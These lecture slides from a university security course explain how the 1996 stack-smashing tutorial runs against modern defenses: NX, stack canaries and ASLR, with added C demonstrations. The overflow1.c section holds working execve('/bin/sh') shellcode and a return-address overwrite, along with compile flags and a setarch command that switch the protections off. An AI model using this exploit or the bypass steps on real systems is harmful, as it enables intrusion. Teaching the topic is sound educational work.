Overview Hurdles Conclusion
CS 6V81-05: Smashing the Stack in 2011
Andrew Folloder
Department of Computer Science, University of Texas at Dallas
January 25th, 2012
Outline
1 Overview
2 Hurdles
  Minor Changes
  eXecute Disable Bit (Data Execution Prevention)
  Stack Protection
  ProPolice, NX, and overflow1.c
  Address Space Layout Randomization
3 Conclusion
Overview
Smashing The Stack For Fun And Profit (1996)
  First tutorial on stack buffer overflows
  Outdated after 15 years of exploit research and defense
How to run the tutorial examples on a modern computer? Talk about:
  intentional hurdles on today's computers
  a few unintentional ones
  how to get around these issues
Minor Changes
Dynamic Buffers
  "Dynamic buffer" no longer refers only to the stack
  Much work has been done on heap-based dynamic buffers
  stack locals -> automatic storage
  heap allocations -> dynamic storage
EBP Register
  Frame pointer for referencing both local variables and parameters
  The x86-64 ABI does not require a frame pointer, so compilers do not treat EBP/RBP as a special-purpose register
  RBP may be used as a general-purpose register (gcc does this by default when optimizing, unless -fno-omit-frame-pointer is given), so the "saved EBP" slot of the 1996 frame diagram may simply not exist
NX (DEP)
  Per-page no-execute bit in the x86 page tables (AMD's NX bit; Intel calls it the eXecute Disable bit, present from later Pentium 4 models on)
  Prevents code from executing from any page not marked executable: the stack, the heap, .data and .bss
  The injected shellcode never runs; the instruction fetch faults and the process gets a segmentation fault
  Like memory page permission bits (read/write/execute)
    1996: pages had only R/W; anything readable was also executable
    Today: R/W/X, and the stack is non-executable unless the binary's PT_GNU_STACK header asks for it (gcc -z execstack)
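To see the no-execute bit do its work, here is an added example that is not part of the slides. It copies a single return instruction into a fresh page and calls it, first with the page mapped read/write only and then with execute permission added through mprotect. The call is made in a forked child so the parent survives the fault and can report the result. It assumes Linux on x86 or AArch64; the instruction bytes for those two architectures are the only hardware-specific part.

```c
#define _GNU_SOURCE
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/wait.h>

/* The smallest possible "shellcode": one return instruction. */
#if defined(__x86_64__) || defined(__i386__)
static const unsigned char ret_insn[] = { 0xc3 };                   /* ret */
#elif defined(__aarch64__)
static const unsigned char ret_insn[] = { 0xc0, 0x03, 0x5f, 0xd6 }; /* ret */
#else
#error "add a return instruction for this architecture"
#endif

/* Write ret_insn into an anonymous page, set the page to RW (executable == 0)
 * or RWX (executable != 0), and call into it. The attempt runs in a child
 * process so the fault does not kill the caller.
 * Returns 1 if the call returned normally, 0 if the child died of SIGSEGV
 * (the NX fault), and -1 if the experiment could not be set up. */
int probe_exec(int executable)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;

    if (pid == 0) {
        size_t len = (size_t)sysconf(_SC_PAGESIZE);
        unsigned char *page = mmap(NULL, len, PROT_READ | PROT_WRITE,
                                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (page == MAP_FAILED)
            _exit(2);
        memcpy(page, ret_insn, sizeof ret_insn);

        int prot = PROT_READ | PROT_WRITE | (executable ? PROT_EXEC : 0);
        if (mprotect(page, len, prot) != 0)
            _exit(2);
        /* Required on architectures with a separate instruction cache. */
        __builtin___clear_cache((char *)page, (char *)page + sizeof ret_insn);

        void (*fn)(void) = (void (*)(void))page;
        fn();               /* faults here when the page is not executable */
        _exit(0);
    }

    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    if (WIFEXITED(status) && WEXITSTATUS(status) == 0)
        return 1;
    if (WIFSIGNALED(status) && WTERMSIG(status) == SIGSEGV)
        return 0;
    return -1;
}

int main(void)
{
    printf("RW  page: %s\n", probe_exec(0) == 1 ? "executed" : "SIGSEGV");
    printf("RWX page: %s\n", probe_exec(1) == 1 ? "executed" : "SIGSEGV");
    return 0;
}
```

The same fault is what the 1996 examples hit when they jump into shellcode sitting on the stack: the bytes are there, but the page they live on lacks the execute bit, so the CPU refuses the instruction fetch.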
Stack Protection
ProPolice/StackGuard
  gcc mechanism for stack buffer protection (StackGuard was a gcc patch; IBM's ProPolice became gcc's -fstack-protector, which Ubuntu's gcc enables by default)
  canary: a pseudo-random value chosen when the process starts
  place the canary within a stack frame between its data (local buffers) and its control elements (saved frame pointer, return address)
  ProPolice also puts character arrays at the top of the locals, right under the canary, so an overflow cannot reach other locals or pointers first
  a linear overflow has to overwrite the canary before it reaches the return address; the function epilogue re-checks the canary and aborts ("*** stack smashing detected ***") on a mismatch
  very difficult to predict the canary value without an information leak
example2.c
------------------------------------------------------
#include <string.h>

void function(char *str) {
    char buffer[16];

    strcpy(buffer, str);   /* no bounds check: anything past 15 bytes overflows */
}

int main(void) {
    char large_string[256];
    int i;

    for (i = 0; i < 255; i++)
        large_string[i] = 'A';
    large_string[255] = '\0';

    function(large_string);
    return 0;
}
------------------------------------------------------
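What the canary check buys, as an added example that is not from the slides: this hand-built frame has the ordering ProPolice produces, buffer below canary below control data, and the check at the end is the same comparison gcc emits in a -fstack-protector epilogue. The reference canary is read from where glibc keeps it on x86 Linux (%fs:0x28 on x86-64, %gs:0x14 on i386), so the example is x86 Linux only; the input bytes are constructed inline.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The per-process reference canary glibc stores in thread-local storage.
 * This is the value gcc's -fstack-protector prologue copies into every
 * protected frame and its epilogue compares against. */
static uintptr_t reference_canary(void)
{
    uintptr_t guard;
#if defined(__x86_64__)
    __asm__("mov %%fs:0x28, %0" : "=r"(guard));
#elif defined(__i386__)
    __asm__("mov %%gs:0x14, %0" : "=r"(guard));
#else
#error "canary location is ABI specific; add this architecture"
#endif
    return guard;
}

/* A frame laid out as ProPolice arranges it: the character buffer lowest,
 * the canary above it, then the control data it shields. The two control
 * words are stand-ins for the saved frame pointer and return address. */
struct frame {
    char buffer[16];
    uintptr_t canary;
    uintptr_t saved_fp;
    uintptr_t return_addr;
};

/* Copy len bytes into the buffer with no bounds check (the overflow), then
 * perform the epilogue check. Returns 1 if the canary is intact, 0 if the
 * write ran over it, which is when __stack_chk_fail would be called. */
int copy_and_check(const unsigned char *input, size_t len)
{
    struct frame f;
    f.canary = reference_canary();
    f.saved_fp = 0x1111;      /* placeholder control data */
    f.return_addr = 0x2222;

    if (len > sizeof f)
        len = sizeof f;       /* keep the write inside the struct itself */
    memcpy(&f, input, len);   /* bytes 16.. land on the canary and beyond */

    return f.canary == reference_canary();
}

/* Feed n bytes of 'A' through copy_and_check (constructed input). */
int demo(size_t n)
{
    unsigned char input[64];
    memset(input, 'A', sizeof input);
    return copy_and_check(input, n < sizeof input ? n : sizeof input);
}

/* glibc clears the canary's lowest byte so that strcpy/strlen-style leaks
 * stop at it; a one-byte overrun with any non-zero byte already changes it. */
int canary_low_byte_is_zero(void)
{
    return (reference_canary() & 0xff) == 0;
}

int main(void)
{
    printf("16 bytes: canary %s\n", demo(16) ? "intact" : "smashed");
    printf("17 bytes: canary %s\n", demo(17) ? "intact" : "smashed");
    printf("canary low byte is zero: %d\n", canary_low_byte_is_zero());
    return 0;
}
```

Sixteen bytes fill the buffer exactly and the check passes; the seventeenth byte lands on the canary's low byte and the check fails before any control data is consulted, which is why example2.c compiled with the default Ubuntu gcc aborts instead of crashing on a bad return address.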
ProPolice, NX, and overflow1.c
overflow1.c
------------------------------------------------------------------------------
#include <string.h>

/* 32-bit Linux execve("/bin/sh") shellcode from the 1996 paper */
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

char large_string[128];

int main(void) {
    char buffer[96];
    int i;
    long *long_ptr = (long *) large_string;

    /* fill large_string with the address of buffer: whichever copy lands on
       the saved return address sends execution back into buffer */
    for (i = 0; i < 32; i++)
        *(long_ptr + i) = (long) buffer;

    /* put the shellcode at the front of large_string */
    for (i = 0; i < strlen(shellcode); i++)
        large_string[i] = shellcode[i];

    strcpy(buffer, large_string);   /* 128 bytes into a 96-byte buffer */
    return 0;
}
------------------------------------------------------------------------------
To get past the two hurdles above, build it as a 32-bit binary (the shellcode uses int 0x80 and 4-byte pointers) with the canary and the non-executable stack switched off: gcc -m32 -fno-stack-protector -z execstack overflow1.c
Even then it does not work on a recent gcc. Reason: gcc allocates far more stack space in recent versions than in the past (the frame is larger and 16-byte aligned), so the 32 bytes written past the end of buffer no longer reach the saved return address; large_string has to be made long enough to cover the extra distance.
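An added example, not from the slides, that measures the quantity the slide blames: how far past the end of buffer a linear copy has to run before it overwrites the saved return address, in a frame with the same locals as overflow1.c's main. It relies on gcc's __builtin_frame_address, which returns the address of the slot holding the saved frame pointer, and on the x86 layout in which the return address is the word above that slot. Build it with the same flags used for overflow1.c (for example -m32 -fno-stack-protector) and the number it prints is the minimum overrun large_string needs.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#if !defined(__x86_64__) && !defined(__i386__)
#error "frame layout assumptions are x86 specific"
#endif

/* A frame with the same locals as overflow1.c's main. Returns how many bytes
 * past the end of buffer[96] a copy must run to cover the saved return
 * address. In the 1996 layout on 32-bit x86 this was 8 (saved EBP plus the
 * return address); today's larger, aligned frames push it higher. */
__attribute__((noinline))
ptrdiff_t overflow_needed(void)
{
    char buffer[96];
    volatile int i = 0;                        /* volatile: keep the locals */
    long * volatile long_ptr = (long *)buffer;
    buffer[0] = (char)i;
    (void)long_ptr;

    /* __builtin_frame_address(0) is where the caller's frame pointer was
     * saved; the return address is the next word up. */
    uintptr_t saved_fp   = (uintptr_t)__builtin_frame_address(0);
    uintptr_t ret_end    = saved_fp + 2 * sizeof(void *);
    uintptr_t buffer_end = (uintptr_t)buffer + sizeof buffer;
    return (ptrdiff_t)(ret_end - buffer_end);
}

int main(void)
{
    ptrdiff_t extra = overflow_needed();
    printf("bytes past buffer[96] needed to cover the return address: %td\n", extra);
    printf("large_string must therefore be at least %td bytes\n", (ptrdiff_t)96 + extra);
    return 0;
}
```

Whatever the number is on a given compiler, it is the distance the 32 bytes of the original large_string were meant to cover, and anything larger than 32 is the reason the unmodified overflow1.c returns to the wrong place instead of into the shellcode.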
ASLR
Address Space Layout Randomization
  Rebases the stack, the heap, shared libraries (DLLs on Windows) and, for position-independent executables, the program's own code on every exec, so a stack address hard-coded into an exploit is wrong on the next run
  Linux knob: /proc/sys/kernel/randomize_va_space (0 = off; 1 = mmap base, stack and vdso randomized; 2 = brk heap as well); to switch it off for a single process use setarch $(uname -m) -R ./a.out
sp.c
--------------------------------
#include <stdio.h>

/* read the stack pointer; 32-bit x86 only (build with -m32) */
unsigned long get_sp(void) {
    unsigned long sp;
    __asm__("movl %%esp,%0" : "=r"(sp));
    return sp;
}

int main(void) {
    printf("0x%lx\n", get_sp());   /* differs between runs while ASLR is on */
    return 0;
}
--------------------------------
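An added example, not from the slides, that shows which regions ASLR moves and reads the Linux setting that controls it. Run it twice and compare the addresses: with randomize_va_space at 2 all of them change; at 1 the brk heap stays put; under setarch -R, or with the setting at 0, they are all stable, which is the condition the 1996 exploit quietly assumes. It assumes Linux with /proc mounted; the text address moves only if the binary is position independent (gcc -pie, the default on current Ubuntu gcc), and the libc entry is 0 for a statically linked binary.

```c
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Value of /proc/sys/kernel/randomize_va_space, or -1 if it cannot be read.
 * 0 = off, 1 = stack, mmap base and vdso randomized, 2 = brk heap as well. */
int aslr_sysctl(void)
{
    FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r");
    int v = -1;
    if (f) {
        if (fscanf(f, "%d", &v) != 1)
            v = -1;
        fclose(f);
    }
    return v;
}

/* Start address of the first /proc/self/maps entry whose line contains name
 * (for example "[stack]", "[heap]", "/libc"), or 0 if there is none. */
uintptr_t region_start(const char *name)
{
    FILE *f = fopen("/proc/self/maps", "r");
    char line[512];
    uintptr_t start = 0;
    if (!f)
        return 0;
    while (fgets(line, sizeof line, f)) {
        if (strstr(line, name)) {
            start = (uintptr_t)strtoull(line, NULL, 16);   /* "start-end ..." */
            break;
        }
    }
    fclose(f);
    return start;
}

struct layout {
    uintptr_t stack, heap, libc, text;
};

/* One address per region ASLR can rebase. Whatever differs between two runs
 * of the program was randomized. */
struct layout sample_layout(void)
{
    struct layout l;
    void *h = malloc(32);                  /* make sure a [heap] segment exists */
    l.stack = region_start("[stack]");
    l.heap  = region_start("[heap]");
    l.libc  = region_start("/libc");
    l.text  = (uintptr_t)&sample_layout;   /* moves only for a PIE binary */
    free(h);
    return l;
}

int main(void)
{
    struct layout l = sample_layout();
    printf("randomize_va_space = %d\n", aslr_sysctl());
    printf("stack 0x%lx  heap 0x%lx  libc 0x%lx  text 0x%lx\n",
           (unsigned long)l.stack, (unsigned long)l.heap,
           (unsigned long)l.libc, (unsigned long)l.text);
    return 0;
}
```

The stack line is the one the sp.c trick above is chasing: the 1996 exploit guessed the stack address once and reused it, and ASLR is the reason that guess has to be refreshed (or randomization disabled) on every run.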
Conclusion
A lot of work has been done to prevent buffer overflow exploits, making them much harder to perform.
This gives a quick overview of how the original "exploit tutorial" can be performed on a modern computer running Ubuntu.